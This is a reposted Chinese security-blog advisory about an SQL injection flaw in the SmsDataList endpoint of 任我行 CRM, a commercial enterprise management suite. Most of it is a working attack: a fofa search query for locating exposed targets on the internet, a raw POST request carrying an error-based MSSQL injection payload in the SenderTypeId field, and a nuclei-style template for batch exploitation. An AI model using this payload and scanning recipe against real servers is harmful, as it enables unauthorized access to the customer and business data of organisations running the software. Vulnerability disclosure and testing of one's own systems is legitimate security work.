任我行 CRM SmsDataList SQL注入

admin 2024年1月29日19:54:31评论20 views字数 1111阅读3分42秒阅读模式

任我行 CRM SmsDataList SQL注入

任我行 CRM SmsDataList SQL注入

漏洞简介

    任我行CRM是CRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件;任我行 CRMSmsDataList接口存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息

任我行 CRM SmsDataList SQL注入

漏洞复现

第一步、使用下面fofa语句进行资产收集,确认测试目标

fofa语句title="欢迎使用任我行CRM"

第二步、漏洞首页

任我行 CRM SmsDataList SQL注入

第三步、使用burp抓取当前页面数据包...将数据包发送到repeater中修改数据包进行测试

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1Content-Length: 169Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

任我行 CRM SmsDataList SQL注入

任我行 CRM SmsDataList SQL注入

批量脚本

id: renwoxing-CRM-SmsDataList-sqliinfo:  name: renwoxing-CRM-SmsDataList-sqli  author: nihao  severity: high  description: 任我行 CRM SmsDataList 存在SQL注入漏洞。  tags: renwoxing,sqli  metadata:    fofa-qeury: title="欢迎使用任我行CRM"http:  - raw:      - |        POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1        Content-Type: application/x-www-form-urlencoded        Host: {{Hostname}}        Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI    matchers:           - type: dsl        name: sqli        dsl:          - "status_code == 200 " 

原文始发于微信公众号(揽月安全团队):任我行 CRM SmsDataList SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月29日19:54:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   任我行 CRM SmsDataList SQL注入https://cn-sec.com/archives/2441397.html

发表评论

匿名网友 填写信息